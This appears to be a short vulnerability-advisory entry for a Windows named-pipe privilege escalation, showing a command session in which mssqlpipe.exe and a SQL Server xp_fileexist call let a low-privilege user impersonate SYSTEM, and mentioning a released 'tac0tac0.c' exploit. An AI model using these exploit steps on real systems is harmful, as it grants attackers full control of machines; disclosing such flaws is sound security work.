|
Microsoft Windows CreateFile API Named Pipe Privilege Escalation Vulnerability
C:\>mssqlpipe.exe cmd.exe Creating pipe: \\.\Pipe\atstake Pipe created, waiting for connectection Connect to the database (with isql for example) and execute: xp_fileexist '\\SERVERNAME\pipe\atsstake' Then in command shell #2: C:\>isql -U andreas Password: 1> xp_fileexist '\\TEMP123\pipe\atstake' 2> go File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 1 0 1 Then, back in command shell #1: Impersonate user successful, we are running as user: SYSTEM A functional version of the tac0tac0.c exploit has been released. The developer of the exploit has advised users to build the exploit in Release mode (and not Debug mode). |
|
 Privacy Statement |
